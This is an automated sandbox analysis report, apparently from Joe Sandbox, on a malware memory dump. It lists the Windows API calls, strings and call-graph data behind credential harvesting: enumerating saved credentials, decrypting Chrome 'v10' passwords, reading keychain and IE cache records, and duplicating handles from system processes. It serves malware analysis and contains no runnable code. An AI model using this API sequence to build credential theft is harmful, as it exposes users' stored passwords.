38866->38868 38867->38865 38868->38867 38870 40e18c 
38869->38870 38871 406b90 11 API calls 38870->38871 38872 40e19f 38871->38872 38873 40e1a7 memset 38872->38873 38874 40e299 38872->38874 38879 40e1e8 38873->38879 38875 4069a3 ??3@YAXPAX free 38874->38875 38876 40e2a4 38875->38876 38876->38841 38877 406e8f 13 API calls 38877->38879 38878 406b53 SetFilePointerEx ReadFile 38878->38879 38879->38877 38879->38878 38880 40dd50 _wcsicmp 38879->38880 38881 40e283 38879->38881 38885 40742e 8 API calls 38879->38885 38886 40aae3 wcslen wcslen _memicmp 38879->38886 38887 40e244 _snwprintf 38879->38887 38880->38879 38882 40e291 38881->38882 38883 40e288 free 38881->38883 38884 40aa04 free 38882->38884 38883->38882 38884->38874 38885->38879 38886->38879 38888 40a8d0 7 API calls 38887->38888 38888->38879 38890 40e2c2 38889->38890 38891 406b90 11 API calls 38890->38891 38902 40e2d3 38891->38902 38892 40e4a0 38893 4069a3 ??3@YAXPAX free 38892->38893 38895 40e4ab 38893->38895 38894 406e8f 13 API calls 38894->38902 38895->38841 38896 406b53 SetFilePointerEx ReadFile 38896->38902 38897 40e489 38898 40aa04 free 38897->38898 38899 40e491 38898->38899 38899->38892 38901 40e497 free 38899->38901 38900 40dd50 _wcsicmp 38900->38902 38901->38892 38902->38892 38902->38894 38902->38896 38902->38897 38902->38900 38903 40dd50 _wcsicmp 38902->38903 38906 40742e 8 API calls 38902->38906 38907 40e3e0 memcpy 38902->38907 38908 40e3fb memcpy 38902->38908 38909 40e3b3 wcschr 38902->38909 38910 40e416 memcpy 38902->38910 38911 40e431 memcpy 38902->38911 38904 40e376 memset 38903->38904 38905 40aa29 6 API calls 38904->38905 38905->38902 38906->38902 38907->38902 38908->38902 38909->38902 38910->38902 38911->38902 38912->38827 38914 40a980 38913->38914 38915 40a995 _wcsicmp 38914->38915 38916 40a99c wcscmp 38914->38916 38917 40a8bb 38914->38917 38915->38914 38916->38914 38917->38768 38917->38769 38918->38772 38920 40aa23 RegEnumValueW 38919->38920 38920->38781 38920->38782 38922 405335 38921->38922 38923 40522a 38921->38923 38922->38373 38924 40b2cc 27 
API calls 38923->38924 38925 405234 38924->38925 38926 40a804 8 API calls 38925->38926 38927 40523a 38926->38927 38966 40b273 38927->38966 38929 405248 _mbscpy _mbscat GetProcAddress 38930 40b273 27 API calls 38929->38930 38931 405279 38930->38931 38969 405211 GetProcAddress 38931->38969 38933 405282 38934 40b273 27 API calls 38933->38934 38935 40528f 38934->38935 38970 405211 GetProcAddress 38935->38970 38937 405298 38938 40b273 27 API calls 38937->38938 38939 4052a5 38938->38939 38971 405211 GetProcAddress 38939->38971 38941 4052ae 38942 40b273 27 API calls 38941->38942 38943 4052bb 38942->38943 38972 405211 GetProcAddress 38943->38972 38945 4052c4 38946 40b273 27 API calls 38945->38946 38947 4052d1 38946->38947 38973 405211 GetProcAddress 38947->38973 38949 4052da 38950 40b273 27 API calls 38949->38950 38951 4052e7 38950->38951 38974 405211 GetProcAddress 38951->38974 38953 4052f0 38954 40b273 27 API calls 38953->38954 38955 4052fd 38954->38955 38975 405211 GetProcAddress 38955->38975 38957 405306 38958 40b273 27 API calls 38957->38958 38959 405313 38958->38959 38976 405211 GetProcAddress 38959->38976 38961 40531c 38962 40b273 27 API calls 38961->38962 38963 405329 38962->38963 38977 405211 GetProcAddress 38963->38977 38965 405332 38965->38922 38967 40b58d 27 API calls 38966->38967 38968 40b18c 38967->38968 38968->38929 38969->38933 38970->38937 38971->38941 38972->38945 38973->38949 38974->38953 38975->38957 38976->38961 38977->38965 38979 40440c FreeLibrary 38978->38979 38980 40436d 38979->38980 38981 40a804 8 API calls 38980->38981 38982 404377 38981->38982 38983 404383 38982->38983 38984 404405 38982->38984 38985 40b273 27 API calls 38983->38985 38984->38379 38984->38380 38984->38384 38986 40438d GetProcAddress 38985->38986 38987 40b273 27 API calls 38986->38987 38988 4043a7 GetProcAddress 38987->38988 38989 40b273 27 API calls 38988->38989 38990 4043ba GetProcAddress 38989->38990 38991 40b273 27 API calls 38990->38991 38992 4043ce GetProcAddress 
38991->38992 38993 40b273 27 API calls 38992->38993 38994 4043e2 GetProcAddress 38993->38994 38995 4043f1 38994->38995 38996 4043f7 38995->38996 38997 40440c FreeLibrary 38995->38997 38996->38984 38997->38984 38999 404413 FreeLibrary 38998->38999 39000 40441e 38998->39000 38999->39000 39000->38395 39001->38391 39003 40447e 39002->39003 39004 40442e 39002->39004 39003->38391 39005 40b2cc 27 API calls 39004->39005 39006 404438 39005->39006 39007 40a804 8 API calls 39006->39007 39008 40443e 39007->39008 39009 404445 39008->39009 39010 404467 39008->39010 39011 40b273 27 API calls 39009->39011 39010->39003 39013 404475 FreeLibrary 39010->39013 39012 40444f GetProcAddress 39011->39012 39012->39010 39014 404460 39012->39014 39013->39003 39014->39010 39016 4135f6 39015->39016 39017 4135eb FreeLibrary 39015->39017 39016->38398 39017->39016 39019 4449c4 39018->39019 39020 444a52 39018->39020 39021 40b2cc 27 API calls 39019->39021 39020->38415 39020->38416 39022 4449cb 39021->39022 39023 40a804 8 API calls 39022->39023 39024 4449d1 39023->39024 39025 40b273 27 API calls 39024->39025 39026 4449dc GetProcAddress 39025->39026 39027 40b273 27 API calls 39026->39027 39028 4449f3 GetProcAddress 39027->39028 39029 40b273 27 API calls 39028->39029 39030 444a04 GetProcAddress 39029->39030 39031 40b273 27 API calls 39030->39031 39032 444a15 GetProcAddress 39031->39032 39033 40b273 27 API calls 39032->39033 39034 444a26 GetProcAddress 39033->39034 39035 40b273 27 API calls 39034->39035 39036 444a37 GetProcAddress 39035->39036 39037 40b273 27 API calls 39036->39037 39038 444a48 GetProcAddress 39037->39038 39038->39020 39039->38426 39040->38426 39041->38426 39042->38426 39043->38417 39045 403a29 39044->39045 39059 403bed memset memset 39045->39059 39047 403ae7 39072 40b1ab free free 39047->39072 39048 403a3f memset 39052 403a2f 39048->39052 39050 403aef 39050->38433 39051 409d1f 6 API calls 39051->39052 39052->39047 39052->39048 39052->39051 39053 409b98 GetFileAttributesW 39052->39053 
39054 40a8d0 7 API calls 39052->39054 39053->39052 39054->39052 39056 40a051 GetFileTime CloseHandle 39055->39056 39057 4039ca CompareFileTime 39055->39057 39056->39057 39057->38433 39058->38434 39060 414c2e 14 API calls 39059->39060 39061 403c38 39060->39061 39062 409719 2 API calls 39061->39062 39063 403c3f wcscat 39062->39063 39064 414c2e 14 API calls 39063->39064 39065 403c61 39064->39065 39066 409719 2 API calls 39065->39066 39067 403c68 wcscat 39066->39067 39073 403af5 39067->39073 39070 403af5 20 API calls 39071 403c95 39070->39071 39071->39052 39072->39050 39074 403b02 39073->39074 39075 40ae18 9 API calls 39074->39075 39084 403b37 39075->39084 39076 403bdb 39078 40aebe FindClose 39076->39078 39077 40add4 wcscmp wcscmp 39077->39084 39079 403be6 39078->39079 39079->39070 39080 40a8d0 7 API calls 39080->39084 39081 40ae18 9 API calls 39081->39084 39082 40ae51 9 API calls 39082->39084 39083 40aebe FindClose 39083->39084 39084->39076 39084->39077 39084->39080 39084->39081 39084->39082 39084->39083 39086 409d1f 6 API calls 39085->39086 39087 404190 39086->39087 39100 409b98 GetFileAttributesW 39087->39100 39089 40419c 39090 4041a7 6 API calls 39089->39090 39091 40435c 39089->39091 39092 40424f 39090->39092 39091->38455 39092->39091 39094 40425e memset 39092->39094 39096 409d1f 6 API calls 39092->39096 39097 40a8ab 9 API calls 39092->39097 39101 414842 39092->39101 39094->39092 39095 404296 wcscpy 39094->39095 39095->39092 39096->39092 39098 4042b6 memset memset _snwprintf wcscpy 39097->39098 39098->39092 39099->38459 39100->39089 39104 41443e 39101->39104 39103 414866 39103->39092 39105 41444b 39104->39105 39106 414451 39105->39106 39107 4144a3 GetPrivateProfileStringW 39105->39107 39108 414491 39106->39108 39109 414455 wcschr 39106->39109 39107->39103 39111 414495 WritePrivateProfileStringW 39108->39111 39109->39108 39110 414463 _snwprintf 39109->39110 39110->39111 39111->39103 39112->38464 39114 40b2cc 27 API calls 39113->39114 39115 409615 39114->39115 39116 
409d1f 6 API calls 39115->39116 39117 409625 39116->39117 39142 409b98 GetFileAttributesW 39117->39142 39119 409634 39120 409648 39119->39120 39143 4091b8 memset 39119->39143 39122 40b2cc 27 API calls 39120->39122 39124 408801 39120->39124 39123 40965d 39122->39123 39125 409d1f 6 API calls 39123->39125 39124->38467 39124->38511 39126 40966d 39125->39126 39195 409b98 GetFileAttributesW 39126->39195 39128 40967c 39128->39124 39129 409681 39128->39129 39196 409529 72 API calls 39129->39196 39131 409690 39131->39124 39132->38489 39133->38511 39134->38494 39135->38511 39136->38499 39142->39119 39197 40a6e6 WideCharToMultiByte 39143->39197 39145 409202 39198 444432 39145->39198 39148 40b273 27 API calls 39149 409236 39148->39149 39244 438552 39149->39244 39152 409383 39154 40b273 27 API calls 39152->39154 39156 409399 39154->39156 39155 409254 39157 40937b 39155->39157 39265 4253cf 17 API calls 39155->39265 39158 438552 133 API calls 39156->39158 39269 424f26 122 API calls 39157->39269 39177 4093a3 39158->39177 39161 409267 39162 4094ff 39273 443d90 39162->39273 39165 4251c4 136 API calls 39165->39177 39167 409507 39175 40951d 39167->39175 39293 408f2f 77 API calls 39167->39293 39169 4093df 39272 424f26 122 API calls 39169->39272 39171 4253cf 17 API calls 39171->39177 39175->39120 39177->39162 39177->39165 39177->39169 39177->39171 39179 4093e4 39177->39179 39270 4253af 17 API calls 39179->39270 39185 4093ed 39271 4253af 17 API calls 39185->39271 39188 4093f9 39188->39169 39189 409409 memcmp 39188->39189 39189->39169 39190 409421 memcmp 39189->39190 39195->39128 39196->39131 39197->39145 39294 4438b5 39198->39294 39200 44444c 39206 409215 39200->39206 39308 415a6d 39200->39308 39203 444486 39205 4444b9 memcpy 39203->39205 39243 4444a4 39203->39243 39204 44469e 39204->39206 39208 443d90 110 API calls 39204->39208 39312 415258 39205->39312 39206->39148 39206->39175 39208->39206 39209 444524 39210 444541 39209->39210 39211 44452a 39209->39211 39315 444316 39210->39315 39349 

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040DDAD
                                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                        • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                      • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                      • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                      • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                      • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                      • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                      • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                      • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                      • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                      • memset.MSVCRT ref: 0040DF5F
                                                                                                      • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                                      • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                      • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                      • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                      • API String ID: 708747863-3398334509

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                                      • memset.MSVCRT ref: 00413D7F
                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                      • memset.MSVCRT ref: 00413E07
                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                      • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                      • free.MSVCRT ref: 00413EC1
                                                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                      • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                      • API String ID: 1344430650-1740548384
                                                                                                      APIs
                                                                                                      • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                      • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                                      • String ID:
                                                                                                      • API String ID: 3473537107-0
                                                                                                      APIs
                                                                                                        • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                        • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                        • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                      • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                      • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                      • free.MSVCRT ref: 00418803
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 1355100292-0
                                                                                                      APIs
                                                                                                      • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                      • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileFind$FirstNext
                                                                                                      • String ID:
                                                                                                      • API String ID: 1690352074-0
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0041898C
                                                                                                      • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoSystemmemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 3558857096-0

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004455C2
                                                                                                      • wcsrchr.MSVCRT ref: 004455DA
                                                                                                      • memset.MSVCRT ref: 0044570D
                                                                                                      • memset.MSVCRT ref: 00445725
                                                                                                        • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                        • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                        • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                        • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                        • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                        • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                        • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                        • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                      • memset.MSVCRT ref: 0044573D
                                                                                                      • memset.MSVCRT ref: 00445755
                                                                                                      • memset.MSVCRT ref: 004458CB
                                                                                                      • memset.MSVCRT ref: 004458E3
                                                                                                      • memset.MSVCRT ref: 0044596E
                                                                                                      • memset.MSVCRT ref: 00445A10
                                                                                                      • memset.MSVCRT ref: 00445A28
                                                                                                      • memset.MSVCRT ref: 00445AC6
                                                                                                        • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                        • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                        • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                        • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                        • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                      • memset.MSVCRT ref: 00445B52
                                                                                                      • memset.MSVCRT ref: 00445B6A
                                                                                                      • memset.MSVCRT ref: 00445C9B
                                                                                                      • memset.MSVCRT ref: 00445CB3
                                                                                                      • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                      • memset.MSVCRT ref: 00445B82
                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                        • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                      • memset.MSVCRT ref: 00445986
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                      • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                      • API String ID: 2263259095-3798722523

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                        • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                        • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                        • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                      • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                                      • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                      • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                      • String ID: $/deleteregkey$/savelangfile
                                                                                                      • API String ID: 2744995895-28296030
                                                                                                      • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                      • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                      • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                      • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040B71C
                                                                                                        • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                        • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                      • wcsrchr.MSVCRT ref: 0040B738
                                                                                                      • memset.MSVCRT ref: 0040B756
                                                                                                      • memset.MSVCRT ref: 0040B7F5
                                                                                                      • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                      • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                      • memset.MSVCRT ref: 0040B851
                                                                                                      • memset.MSVCRT ref: 0040B8CA
                                                                                                      • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                                        • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                      • memset.MSVCRT ref: 0040BB53
                                                                                                      • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                      • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$Freewcsrchr$AddressCloseCreateFileHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                                                                      • String ID: chp$v10
                                                                                                      • API String ID: 4290143792-2783969131
                                                                                                      • Opcode ID: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                                                      • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                      • Opcode Fuzzy Hash: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                                                      • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                      • free.MSVCRT ref: 0040E49A
                                                                                                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                      • memset.MSVCRT ref: 0040E380
                                                                                                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                        • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                      • wcschr.MSVCRT ref: 0040E3B8
                                                                                                      • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,76F92EE0), ref: 0040E3EC
                                                                                                      • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,76F92EE0), ref: 0040E407
                                                                                                      • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,76F92EE0), ref: 0040E422
                                                                                                      • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,76F92EE0), ref: 0040E43D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                      • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                      • API String ID: 3849927982-2252543386
                                                                                                      • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                      • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                      • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                      • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004091E2
                                                                                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
